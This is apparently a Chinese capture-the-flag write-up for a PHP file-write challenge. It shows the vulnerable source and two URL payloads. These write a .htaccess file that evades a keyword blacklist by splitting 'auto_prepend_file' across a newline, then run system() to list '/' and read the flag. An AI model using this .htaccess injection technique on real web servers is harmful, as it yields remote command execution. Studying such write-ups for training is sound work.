0x00
官方源码
0x01
环境搭建好后,访问发现源码.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
include_once("fl3g.php");
if(!isset($_GET['content']) || !isset($_GET['filename'])) {
highlight_file(__FILE__);
die();
}
$content = $_GET['content'];
if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) {
echo "Hacker";
die();
}
$filename = $_GET['filename'];
if(preg_match("/[^a-z.]/", $filename) == 1) {
echo "Hacker";
die();
}
$files = scandir('./');
foreach($files as $file) {
if(is_file($file)){
if ($file !== "index.php") {
unlink($file);
}
}
}
file_put_contents($filename, $content . "nJust one chance");
?>
|
大致分析源码,可以想到通过写.htaccess来执行命令.黑名单可已通过
并且注意到最后填加了nJust one chance,我们只要自己加上一个
0x02
payload:
1
2
|
/?filename=.htaccess&content=php_value%20auto_prepend_fi%0Ale%20".htaccess"%0A%23<?php%20system(%27ls%20/%27);?>%0A%23%20
/?filename=.htaccess&content=php_value%20auto_prepend_fi%0Ale%20".htaccess"%0A%23<?php%20system(%27cat /fl%0Aag%27);?>%0A%23%20
|
近期评论